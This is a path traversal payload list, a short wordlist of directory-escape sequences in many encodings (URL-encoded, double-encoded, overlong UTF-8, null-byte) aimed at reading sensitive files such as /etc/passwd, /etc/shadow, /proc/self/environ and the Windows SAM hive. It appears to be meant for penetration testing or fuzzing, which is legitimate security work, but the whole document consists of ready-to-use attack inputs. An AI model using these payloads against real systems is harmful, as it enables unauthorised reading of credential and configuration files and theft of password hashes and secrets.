# Path Traversal Test Payloads
# Use with caution - only against test environments
# Each line is a separate payload

../
../../
../../../
../../../../
../../../../../
../../../../../../
../../../../../../../
..%2f
..%2f..%2f
..%252f
..%252f..%252f
....//
....//....//
..%c0%af
..%c1%9c
..\/
..\
..\..\
..\..\..\
%2e%2e%2f
%2e%2e/
%2e%2e%5c
..%00/
..%0d/
..%5c
..%ff/
/etc/passwd
/etc/shadow
/etc/hosts
/proc/self/environ
/var/log/apache2/access.log
C:\Windows\System32\config\SAM
C:\Windows\win.ini
C:\boot.ini
....//....//etc/passwd
..%252f..%252f..%252fetc/passwd
....\/....\/etc/passwd
..%c0%af..%c0%afetc/passwd
..%255c..%255c..%255cetc/passwd
%252e%252e%252fetc/passwd
..%25c0%25afetc/passwd
..%c0%ae%c0%ae/etc/passwd
/....//....//....//etc/passwd
file:///etc/passwd
file://localhost/etc/passwd
